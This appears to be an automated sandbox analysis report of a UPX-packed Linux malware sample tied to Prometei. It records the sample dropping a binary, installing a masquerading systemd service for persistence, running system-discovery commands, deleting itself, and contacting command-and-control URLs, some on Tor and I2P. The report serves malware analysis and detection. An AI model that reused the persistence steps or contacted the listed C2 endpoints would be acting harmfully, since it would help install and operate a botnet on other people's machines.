Source: /bin/sh (PID: 5296)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
Source: /bin/sh (PID: 5311)Systemctl executable: /usr/bin/systemctl -> systemctl enable uplugplay.serviceJump to behavior
Source: /bin/sh (PID: 5316)Systemctl executable: /usr/bin/systemctl -> systemctl start uplugplay.serviceJump to behavior
Source: /tmp/PMidZ9jAKZ (PID: 5270)File: /usr/sbin/uplugplay (bits: -v usr: x grp: x all: r)Jump to behavior
Source: /tmp/PMidZ9jAKZ (PID: 5273)Shell command executed: sh -c "pgrep PMidZ9jAKZ"Jump to behavior
Source: /tmp/PMidZ9jAKZ (PID: 5277)Shell command executed: sh -c "pidof PMidZ9jAKZ"Jump to behavior
Source: /tmp/PMidZ9jAKZ (PID: 5283)Shell command executed: sh -c "pgrep uplugplay"Jump to behavior
Source: /tmp/PMidZ9jAKZ (PID: 5287)Shell command executed: sh -c "pgrep upnpsetup"Jump to behavior
Source: /tmp/PMidZ9jAKZ (PID: 5291)Shell command executed: sh -c "pidof upnpsetup"Jump to behavior
Source: /tmp/PMidZ9jAKZ (PID: 5295)Shell command executed: sh -c "systemctl daemon-reload"Jump to behavior
Source: /tmp/PMidZ9jAKZ (PID: 5310)Shell command executed: sh -c "systemctl enable uplugplay.service"Jump to behavior
Source: /tmp/PMidZ9jAKZ (PID: 5315)Shell command executed: sh -c "systemctl start uplugplay.service"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5331)Shell command executed: sh -c "/usr/sbin/uplugplay -Dcomsvc"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5338)Shell command executed: sh -c "cat /proc/cpuinfo"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5342)Shell command executed: sh -c "dmidecode --type baseboard"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5347)Shell command executed: sh -c "dmidecode --type baseboard"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5351)Shell command executed: sh -c "dmidecode --type baseboard"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5355)Shell command executed: sh -c "dmidecode --type baseboard"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5361)Shell command executed: sh -c "dmidecode --type baseboard"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5365)Shell command executed: sh -c "dmidecode --type baseboard"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5369)Shell command executed: sh -c dmidecodeJump to behavior
Source: /usr/sbin/uplugplay (PID: 5374)Shell command executed: sh -c "cat /etc/os-release"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5378)Shell command executed: sh -c uptimeJump to behavior
Source: /usr/sbin/uplugplay (PID: 5398)Shell command executed: sh -c "uname -a"Jump to behavior
Source: /usr/bin/dash (PID: 5408)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.hDfDW3v72C /tmp/tmp.cWP5WAFbt1 /tmp/tmp.FmPMX5ZHi1Jump to behavior
Source: /bin/sh (PID: 5274)Pgrep executable: /usr/bin/pgrep -> pgrep PMidZ9jAKZJump to behavior
Source: /bin/sh (PID: 5284)Pgrep executable: /usr/bin/pgrep -> pgrep uplugplayJump to behavior
Source: /bin/sh (PID: 5288)Pgrep executable: /usr/bin/pgrep -> pgrep upnpsetupJump to behavior
Source: submitted sampleStderr: Created symlink /etc/systemd/system/multi-user.target.wants/uplugplay.service /lib/systemd/system/uplugplay.service.: exit code = 0

Hooking and other Techniques for Hiding and Protection

barindex
Source: /tmp/PMidZ9jAKZ (PID: 5270)File: /usr/sbin/uplugplayJump to dropped file
Source: /tmp/PMidZ9jAKZ (PID: 5270)File: /tmp/PMidZ9jAKZJump to behavior
Source: /usr/bin/pgrep (PID: 5274)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/pgrep (PID: 5288)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/sbin/uplugplay (PID: 5332)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/uptime (PID: 5379)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /tmp/PMidZ9jAKZ (PID: 5270)Queries kernel information via 'uname': Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5319)Queries kernel information via 'uname': Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5332)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/uname (PID: 5399)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/cat (PID: 5339)Reads CPU info from proc file: /proc/cpuinfoJump to behavior
Source: /bin/sh (PID: 5399)Uname executable: /usr/bin/uname -> uname -aJump to behavior
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
Scripting
1
Systemd Service
1
Systemd Service
1
Masquerading
1
OS Credential Dumping
1
Security Software Discovery
Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
File and Directory Permissions Modification
LSASS Memory4
System Information Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
Ingress Tool Transfer
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
Scripting
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
Non-Application Layer Protocol
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
Obfuscated Files or Information
NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer3
Application Layer Protocol
SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
File Deletion
LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size Limits1
Proxy
Manipulate Device CommunicationManipulate App Store Rankings or Ratings
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 559888 Sample: PMidZ9jAKZ Startdate: 26/01/2022 Architecture: LINUX Score: 64 76 p3.feefreepool.net 88.198.246.242, 44394, 56830, 56832 HETZNER-ASDE Germany 2->76 78 109.202.202.202, 80 INIT7CH Switzerland 2->78 80 3 other IPs or domains 2->80 82 Multi AV Scanner detection for submitted file 2->82 84 Found Tor onion address 2->84 86 Sample is packed with UPX 2->86 11 systemd uplugplay 2->11         started        13 PMidZ9jAKZ 2->13         started        17 systemd snapd-env-generator 2->17         started        19 10 other processes 2->19 signatures3 process4 file5 21 uplugplay 11->21         started        72 /usr/sbin/uplugplay, ELF 13->72 dropped 88 Drops files in suspicious directories 13->88 90 Sample deletes itself 13->90 23 PMidZ9jAKZ sh 13->23         started        25 PMidZ9jAKZ sh 13->25         started        27 PMidZ9jAKZ sh 13->27         started        29 5 other processes 13->29 signatures6 process7 process8 31 uplugplay sh 21->31         started        33 sh pgrep 23->33         started        35 sh pidof 25->35         started        37 sh pgrep 27->37         started        39 sh pgrep 29->39         started        41 sh pidof 29->41         started        43 sh systemctl 29->43         started        45 2 other processes 29->45 process9 47 sh uplugplay 31->47         started        file10 74 /etc/CommId, ASCII 47->74 dropped 50 uplugplay sh 47->50         started        52 uplugplay sh 47->52         started        54 uplugplay sh 47->54         started        56 8 other processes 47->56 process11 process12 58 sh cat 50->58         started        60 sh dmidecode 52->60         started        62 sh dmidecode 54->62         started        64 sh dmidecode 56->64         started        66 sh dmidecode 56->66         started        68 sh dmidecode 56->68         started        70 5 other processes 56->70
SourceDetectionScannerLabelLink
PMidZ9jAKZ16%VirustotalBrowse
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://p3.feefreepool.net/cgi-bin/prometei.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rg0%Avira URL Cloudsafe
http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi0%Avira URL Cloudsafe
http://p3.feefreepool.net/cgi-bin/prometei.cgi0%Avira URL Cloudsafe
https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi4%VirustotalBrowse
https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi0%Avira URL Cloudsafe
http://p3.feefreepool.net/cgi-bin/prometei.cgi?r=58&i=7B1B0KLF45MTZ5280%Avira URL Cloudsafe
http://dummy.zero/cgi-bin/prometei.cgi0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
p3.feefreepool.net
88.198.246.242
truetrue
    unknown
    NameMaliciousAntivirus DetectionReputation
    http://p3.feefreepool.net/cgi-bin/prometei.cgi?r=58&i=7B1B0KLF45MTZ528false
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://p3.feefreepool.net/cgi-bin/prometei.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgPMidZ9jAKZ, 5270.1.00000000a41ba199.00000000d55ef298.rw-.sdmptrue
    • Avira URL Cloud: safe
    unknown
    http://upx.sf.netPMidZ9jAKZ, uplugplay.10.drfalse
      high
      http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgiPMidZ9jAKZ, 5270.1.00000000a41ba199.00000000d55ef298.rw-.sdmptrue
      • Avira URL Cloud: safe
      unknown
      http://p3.feefreepool.net/cgi-bin/prometei.cgiPMidZ9jAKZ, 5270.1.00000000a41ba199.00000000d55ef298.rw-.sdmptrue
      • Avira URL Cloud: safe
      unknown
      https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgiPMidZ9jAKZ, 5270.1.00000000a41ba199.00000000d55ef298.rw-.sdmptrue
      • 4%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      http://dummy.zero/cgi-bin/prometei.cgiPMidZ9jAKZ, 5270.1.00000000a41ba199.00000000d55ef298.rw-.sdmptrue
      • Avira URL Cloud: safe
      unknown
      https://ubuntu.com/blog/microk8s-memory-optimisationmotd-news.113.drfalse
        high
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        88.198.246.242
        p3.feefreepool.netGermany
        24940HETZNER-ASDEtrue
        54.171.230.55
        unknownUnited States
        16509AMAZON-02USfalse
        109.202.202.202
        unknownSwitzerland
        13030INIT7CHfalse
        91.189.91.43
        unknownUnited Kingdom
        41231CANONICAL-ASGBfalse
        91.189.91.42
        unknownUnited Kingdom
        41231CANONICAL-ASGBfalse
        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
        88.198.246.242zsvc.exeGet hashmaliciousBrowse
        • p1.feefreepool.net/cgi-bin/prometei.cgi?r=-1224&i=90Z405GXDA2Q5271
        3V9alTXIliGet hashmaliciousBrowse
        • p1.feefreepool.net/cgi-bin/prometei.cgi?r=0&i=MKWJIGBKXJXI0948
        promet16Get hashmaliciousBrowse
        • p1.feefreepool.net/cgi-bin/prometei.cgi?r=0&i=0X81G723HYG17S60
        promet15Get hashmaliciousBrowse
        • p1.feefreepool.net/cgi-bin/prometei.cgi?r=18&i=6214X121I3A61W1S
        promet2Get hashmaliciousBrowse
        • p1.feefreepool.net/cgi-bin/prometei.cgi?r=18&i=MU2G1NCM0HDF3L2N
        EKbGofM1r6Get hashmaliciousBrowse
        • p1.feefreepool.net/cgi-bin/prometei.cgi?r=0&i=ENEP5O05YTLM46K2
        54.171.230.55cemtopGet hashmaliciousBrowse
          qtmzbnGet hashmaliciousBrowse
            arm5Get hashmaliciousBrowse
              arm7Get hashmaliciousBrowse
                sh4Get hashmaliciousBrowse
                  beamer.arm6-20220125-0751Get hashmaliciousBrowse
                    6kJbNo1Qa2Get hashmaliciousBrowse
                      garm7Get hashmaliciousBrowse
                        gyyrqb9nbfGet hashmaliciousBrowse
                          KzdybjRQ1OGet hashmaliciousBrowse
                            MGvp9MsVtQGet hashmaliciousBrowse
                              gummy.arm7Get hashmaliciousBrowse
                                lEYJGT0bsMGet hashmaliciousBrowse
                                  gummy.ppcGet hashmaliciousBrowse
                                    gummy.sparcGet hashmaliciousBrowse
                                      a-r.m-4.SakuraGet hashmaliciousBrowse
                                        iGYPh4vrTOGet hashmaliciousBrowse
                                          wnjgVDfa0gGet hashmaliciousBrowse
                                            armGet hashmaliciousBrowse
                                              beamer.x86-20220123-2000Get hashmaliciousBrowse
                                                109.202.202.202atxhuaGet hashmaliciousBrowse
                                                  cemtopGet hashmaliciousBrowse
                                                    earyzqGet hashmaliciousBrowse
                                                      fwdfvfGet hashmaliciousBrowse
                                                        lnkfmxGet hashmaliciousBrowse
                                                          nvitpjGet hashmaliciousBrowse
                                                            qtmzbnGet hashmaliciousBrowse
                                                              qvmxvlGet hashmaliciousBrowse
                                                                razdznGet hashmaliciousBrowse
                                                                  vtyhatGet hashmaliciousBrowse
                                                                    vvglmaGet hashmaliciousBrowse
                                                                      arcGet hashmaliciousBrowse
                                                                        armGet hashmaliciousBrowse
                                                                          arm5Get hashmaliciousBrowse
                                                                            arm6Get hashmaliciousBrowse
                                                                              arm7Get hashmaliciousBrowse
                                                                                i586Get hashmaliciousBrowse
                                                                                  i686Get hashmaliciousBrowse
                                                                                    darm7Get hashmaliciousBrowse
                                                                                      mipsGet hashmaliciousBrowse
                                                                                        No context
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                        HETZNER-ASDEFedEx Package.exeGet hashmaliciousBrowse
                                                                                        • 144.76.136.153
                                                                                        8sQIwmykhK.dllGet hashmaliciousBrowse
                                                                                        • 78.47.204.80
                                                                                        Loader.exeGet hashmaliciousBrowse
                                                                                        • 136.243.172.101
                                                                                        8q29ccl9udkb.dllGet hashmaliciousBrowse
                                                                                        • 78.47.204.80
                                                                                        zyxd7AEkBbQoGfYYyWw.dllGet hashmaliciousBrowse
                                                                                        • 78.47.204.80
                                                                                        MeA7.dllGet hashmaliciousBrowse
                                                                                        • 78.47.204.80
                                                                                        04KvoWMm7A.dllGet hashmaliciousBrowse
                                                                                        • 78.47.204.80
                                                                                        oIti9XVnG.dllGet hashmaliciousBrowse
                                                                                        • 178.63.25.185
                                                                                        gAT2Oj3OTz.exeGet hashmaliciousBrowse
                                                                                        • 148.251.234.83
                                                                                        gAT2Oj3OTz.exeGet hashmaliciousBrowse
                                                                                        • 148.251.234.83
                                                                                        8yFmOmFwxN.dllGet hashmaliciousBrowse
                                                                                        • 78.47.204.80
                                                                                        dC8gRk0W3u.dllGet hashmaliciousBrowse
                                                                                        • 78.47.204.80
                                                                                        foc invoices.xlsxGet hashmaliciousBrowse
                                                                                        • 135.181.8.218
                                                                                        hCOTbOPn1b.dllGet hashmaliciousBrowse
                                                                                        • 178.63.25.185
                                                                                        9X3HSjWQkE.dllGet hashmaliciousBrowse
                                                                                        • 178.63.25.185
                                                                                        Mv16xwmzLS.dllGet hashmaliciousBrowse
                                                                                        • 78.47.204.80
                                                                                        dX69XxIKKp.dllGet hashmaliciousBrowse
                                                                                        • 78.47.204.80
                                                                                        index.dllGet hashmaliciousBrowse
                                                                                        • 178.63.25.185
                                                                                        rjnRrfBGBz.dllGet hashmaliciousBrowse
                                                                                        • 178.63.25.185
                                                                                        ScLfgVNt48.exeGet hashmaliciousBrowse
                                                                                        • 148.251.234.83
                                                                                        AMAZON-02USFAX-ET_REMIT103INV364783-PDF.htmGet hashmaliciousBrowse
                                                                                        • 52.29.0.64
                                                                                        cemtopGet hashmaliciousBrowse
                                                                                        • 54.171.230.55
                                                                                        qtmzbnGet hashmaliciousBrowse
                                                                                        • 54.171.230.55
                                                                                        razdznGet hashmaliciousBrowse
                                                                                        • 34.249.145.219
                                                                                        arm5Get hashmaliciousBrowse
                                                                                        • 54.171.230.55
                                                                                        SNO22 595406_RACX-159814.exeGet hashmaliciousBrowse
                                                                                        • 52.217.169.125
                                                                                        arm7Get hashmaliciousBrowse
                                                                                        • 54.171.230.55
                                                                                        30WT4nTbpv.exeGet hashmaliciousBrowse
                                                                                        • 44.227.76.166
                                                                                        E48V1NL0GX.exeGet hashmaliciousBrowse
                                                                                        • 54.71.30.209
                                                                                        3wpfooP5Io.exeGet hashmaliciousBrowse
                                                                                        • 52.89.53.122
                                                                                        QUOTATION REQUEST - SUPPLY OF PRODUCTS - DTD JANUARY 2022PDF.xlsxGet hashmaliciousBrowse
                                                                                        • 52.89.53.122
                                                                                        sh4Get hashmaliciousBrowse
                                                                                        • 54.171.230.55
                                                                                        c856f08_2113smart.xlsxGet hashmaliciousBrowse
                                                                                        • 176.34.241.253
                                                                                        vsl_rfq01209800122.exeGet hashmaliciousBrowse
                                                                                        • 3.64.163.50
                                                                                        501000004751.exeGet hashmaliciousBrowse
                                                                                        • 18.159.59.253
                                                                                        Proforma Invoice.docxGet hashmaliciousBrowse
                                                                                        • 13.225.39.127
                                                                                        DHLAWB9678547836.exeGet hashmaliciousBrowse
                                                                                        • 3.64.163.50
                                                                                        beamer.arm6-20220125-0751Get hashmaliciousBrowse
                                                                                        • 54.171.230.55
                                                                                        nISZTlqk7XGet hashmaliciousBrowse
                                                                                        • 34.249.145.219
                                                                                        CeIlR9wbohGet hashmaliciousBrowse
                                                                                        • 34.249.145.219
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                        fb4726d465c5f28b84cd6d14cedd13a7qtmzbnGet hashmaliciousBrowse
                                                                                        • 54.171.230.55
                                                                                        6kJbNo1Qa2Get hashmaliciousBrowse
                                                                                        • 54.171.230.55
                                                                                        hVpnY43lD4Get hashmaliciousBrowse
                                                                                        • 54.171.230.55
                                                                                        KzdybjRQ1OGet hashmaliciousBrowse
                                                                                        • 54.171.230.55
                                                                                        gummy.arm7Get hashmaliciousBrowse
                                                                                        • 54.171.230.55
                                                                                        armGet hashmaliciousBrowse
                                                                                        • 54.171.230.55
                                                                                        Roo5ZaLxh7Get hashmaliciousBrowse
                                                                                        • 54.171.230.55
                                                                                        apL.mips-20220121-0317Get hashmaliciousBrowse
                                                                                        • 54.171.230.55
                                                                                        x-3.2-.SakuraGet hashmaliciousBrowse
                                                                                        • 54.171.230.55
                                                                                        x-3.2-.ISISGet hashmaliciousBrowse
                                                                                        • 54.171.230.55
                                                                                        sJjtE0SIUAGet hashmaliciousBrowse
                                                                                        • 54.171.230.55
                                                                                        ei1GN1bm9j.binGet hashmaliciousBrowse
                                                                                        • 54.171.230.55
                                                                                        7vGzpU7jE5Get hashmaliciousBrowse
                                                                                        • 54.171.230.55
                                                                                        3zrwbZxY4XGet hashmaliciousBrowse
                                                                                        • 54.171.230.55
                                                                                        aNO8pyQqrdGet hashmaliciousBrowse
                                                                                        • 54.171.230.55
                                                                                        file.shGet hashmaliciousBrowse
                                                                                        • 54.171.230.55
                                                                                        4M7eKBXgmPGet hashmaliciousBrowse
                                                                                        • 54.171.230.55
                                                                                        0fxLXeIFzdGet hashmaliciousBrowse
                                                                                        • 54.171.230.55
                                                                                        x86Get hashmaliciousBrowse
                                                                                        • 54.171.230.55
                                                                                        zr2f3By45jGet hashmaliciousBrowse
                                                                                        • 54.171.230.55
                                                                                        No context
                                                                                        Process:/usr/sbin/uplugplay
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):16
                                                                                        Entropy (8bit):3.75
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:1VI9Q:g9Q
                                                                                        MD5:21F5C6D170777186E759EC9CEE2BEB1C
                                                                                        SHA1:1EDB9B844064E200FB7B25E787C7360E2983377F
                                                                                        SHA-256:A0B35A734C82EA7F705D9C961A8026BD3646C292480A793972BC66D2718ACAC1
                                                                                        SHA-512:AA374F30DAF41C1F4D22A2F25B12FA76A89DAF83A6250459B1CCE13E09867E2444F7DDAC22A79DB447C5ADA4BD6A1573D9B515C87273AF4B6E84E10E83C2B56F
                                                                                        Malicious:true
                                                                                        Reputation:low
                                                                                        Preview:7B1B0KLF45MTZ528
                                                                                        Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):76
                                                                                        Entropy (8bit):3.7627880354948586
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                                                                        MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                                                                        SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                                                                        SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                                                                        SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                                                                        Malicious:false
                                                                                        Reputation:moderate, very likely benign file
                                                                                        Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                                                                        Process:/tmp/PMidZ9jAKZ
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):145
                                                                                        Entropy (8bit):4.769509838572339
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:zMZa75X1PxQJqtWA1+DRvBADMikAdIgQ+aQmNJX4ev+sirSkQmWA1+DRvn:z8uXcqtWA4RZAMD+aBNdhTILQmWA4Rv
                                                                                        MD5:8CA62D1F47880BCE036C2956C9B7B272
                                                                                        SHA1:3BCC3A5C4FCC5B0D08C4524A59F6B8E113B62060
                                                                                        SHA-256:C655D3D4E374FAD38313EC4262207B2D7D68A870238F203EF3C33F85E66C8E32
                                                                                        SHA-512:4CD2D9D67151FA25E833707DEE2442C4A5F752053FC2C36EC73C0E2B734C66CA69C63FCEB47714D9ADD5B9FE2EEE1E45BE5199E2CAE7C26173E766B333877DA6
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:[Unit].Description=UPlugPlay.After=multi-user.target..[Service].Type=forking.ExecStart=/usr/sbin/uplugplay..[Install].WantedBy=multi-user.target.
                                                                                        Process:/tmp/PMidZ9jAKZ
                                                                                        File Type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
                                                                                        Category:dropped
                                                                                        Size (bytes):426540
                                                                                        Entropy (8bit):7.942139024065919
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:vuUGbSUQf6LndsBl8c7Imd7Bb7PfZwZfYEmvozMy+:vuuujdCr7X57HZwVEoW
                                                                                        MD5:82E6B25291D35CEE856681DA70AAE3FD
                                                                                        SHA1:13AF6D48BD4BF48A1A8333E4A54A0FB2D84E0599
                                                                                        SHA-256:47B5033A6623BCDB51A7291D85DF39ADBC9F9CFC82281739EF47E1C0263C37BB
                                                                                        SHA-512:DE98586E59842AB9384A1D84541F13FB816078EAB4C2A0616C01149CC7ADE590806EB15B3B02F7BF495634087F88E5F84A4DC50A559018729AFCA7DCD61071E1
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: SUSP_ELF_LNX_UPX_Compressed_File, Description: Detects a suspicious ELF binary with UPX compression, Source: /usr/sbin/uplugplay, Author: Florian Roth
                                                                                        Reputation:low
                                                                                        Preview:.ELF..............>......pF.....@...................@.8...@.......................@.......@......y.......y................................F.......F.............................Q.td....................................................k&1FUPX!$........(...(..p............. ..ELF......>....@........ .'8..........W.3c..-.......o..K>...@Q....obo...N...|...o...={...-.Q.`XO...m..o..p..@.... ....on.....D_D..uK...O._.m(.S.tdO..n.Qn....s;.oRO.....0...*I.$.P.............y......GNU....'..l......?...y1qN...v.r=Q...!`X.,........_....Q.%.yr...SM./P..^...p.D.....BF.0.....]....K........y.../..p........LG...._...#/v..._P.C2.b.`...y!#...x0...@p..d.L.h..`r!#/..X...vP_./H....@?.TM"8..8.0O...`(...q.\. ..O.$ar .@%I.Q....]...I-.n.......H...H...H..t..."...9.....?..%......D................................}....ume....]U....ME=....5-%..................-..E.t$..T$.<{....%.....H.|$.....9.g...Sd2.OH.. ......kn(...$. 1.H9.`K..t>d....4..u......>2..w..H.. -U.H.=$...o....... ......=.._w.Ru6...k....N.y.
                                                                                        Process:/usr/bin/cut
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):191
                                                                                        Entropy (8bit):4.515771857099866
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:P2lnI+5MsqqzNLz+FRNScHUBfRau95++sZzR5woLB1Fh0VTGTl/X5kURn:OZ8uNLzDc0pR75+9Zz/woFmIT52URn
                                                                                        MD5:DD514F892B5F93ED615D366E58AC58AF
                                                                                        SHA1:BA75EDB3C2232CC260BC187F604DC8F25AA72C11
                                                                                        SHA-256:F40D0DCE6E83DF74109FEF5E68E51CC255727783EEAE04C3E34677E23F7552CF
                                                                                        SHA-512:9150BDE63F6C4850C5340D8877892B4D9BBF9EBDC98CDCF557A93FA304C1222CEE446418F5BE2ACCDBF38393778AFA5D4F3EDCB37A47BF57D3A4B2DEAD42A2D0
                                                                                        Malicious:false
                                                                                        Reputation:moderate, very likely benign file
                                                                                        Preview: * Super-optimized for small spaces - read how we shrank the memory. footprint of MicroK8s to make it the smallest full K8s around... https://ubuntu.com/blog/microk8s-memory-optimisation.
                                                                                        File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
                                                                                        Entropy (8bit):7.942139024065919
                                                                                        TrID:
                                                                                        • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                                                                        • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                                                                        File name:PMidZ9jAKZ
                                                                                        File size:426540
                                                                                        MD5:82e6b25291d35cee856681da70aae3fd
                                                                                        SHA1:13af6d48bd4bf48a1a8333e4a54a0fb2d84e0599
                                                                                        SHA256:47b5033a6623bcdb51a7291d85df39adbc9f9cfc82281739ef47e1c0263c37bb
                                                                                        SHA512:de98586e59842ab9384a1d84541f13fb816078eab4c2a0616c01149cc7ade590806eb15b3b02f7bf495634087f88e5f84a4dc50a559018729afca7dcd61071e1
                                                                                        SSDEEP:12288:vuUGbSUQf6LndsBl8c7Imd7Bb7PfZwZfYEmvozMy+:vuuujdCr7X57HZwVEoW
                                                                                        File Content Preview:.ELF..............>......pF.....@...................@.8...@.......................@.......@......y.......y................................F.......F.............................Q.td....................................................k&1FUPX!$........(...(.

                                                                                        ELF header

                                                                                        Class:ELF64
                                                                                        Data:2's complement, little endian
                                                                                        Version:1 (current)
                                                                                        Machine:Advanced Micro Devices X86-64
                                                                                        Version Number:0x1
                                                                                        Type:EXEC (Executable file)
                                                                                        OS/ABI:UNIX - System V
                                                                                        ABI Version:0
                                                                                        Entry Point Address:0x467088
                                                                                        Flags:0x0
                                                                                        ELF Header Size:64
                                                                                        Program Header Offset:64
                                                                                        Program Header Size:56
                                                                                        Number of Program Headers:3
                                                                                        Section Header Offset:0
                                                                                        Section Header Size:64
                                                                                        Number of Section Headers:0
                                                                                        Header String Table Index:0
                                                                                        TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                        LOAD0x00x4000000x4000000x679a30x679a34.33740x5R E0x1000
                                                                                        LOAD0x00x4680000x4680000x00xe1d4980.00000x6RW 0x1000
                                                                                        GNU_STACK0x00x00x00x00x00.00000x6RW 0x10
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Jan 26, 2022 00:02:59.715209007 CET33608443192.168.2.2354.171.230.55
                                                                                        Jan 26, 2022 00:02:59.771462917 CET4433360854.171.230.55192.168.2.23
                                                                                        Jan 26, 2022 00:03:01.503453016 CET42836443192.168.2.2391.189.91.43
                                                                                        Jan 26, 2022 00:03:02.271280050 CET4251680192.168.2.23109.202.202.202
                                                                                        Jan 26, 2022 00:03:11.234282970 CET5683080192.168.2.2388.198.246.242
                                                                                        Jan 26, 2022 00:03:11.256640911 CET805683088.198.246.242192.168.2.23
                                                                                        Jan 26, 2022 00:03:11.256752014 CET5683080192.168.2.2388.198.246.242
                                                                                        Jan 26, 2022 00:03:11.263578892 CET5683080192.168.2.2388.198.246.242
                                                                                        Jan 26, 2022 00:03:11.322523117 CET805683088.198.246.242192.168.2.23
                                                                                        Jan 26, 2022 00:03:11.322619915 CET5683080192.168.2.2388.198.246.242
                                                                                        Jan 26, 2022 00:03:11.323157072 CET805683088.198.246.242192.168.2.23
                                                                                        Jan 26, 2022 00:03:11.343491077 CET5683080192.168.2.2388.198.246.242
                                                                                        Jan 26, 2022 00:03:11.365525961 CET805683088.198.246.242192.168.2.23
                                                                                        Jan 26, 2022 00:03:16.095022917 CET43928443192.168.2.2391.189.91.42
                                                                                        Jan 26, 2022 00:03:16.860855103 CET4433360854.171.230.55192.168.2.23
                                                                                        Jan 26, 2022 00:03:16.860874891 CET4433360854.171.230.55192.168.2.23
                                                                                        Jan 26, 2022 00:03:16.860891104 CET4433360854.171.230.55192.168.2.23
                                                                                        Jan 26, 2022 00:03:16.860914946 CET4433360854.171.230.55192.168.2.23
                                                                                        Jan 26, 2022 00:03:16.860975981 CET33608443192.168.2.2354.171.230.55
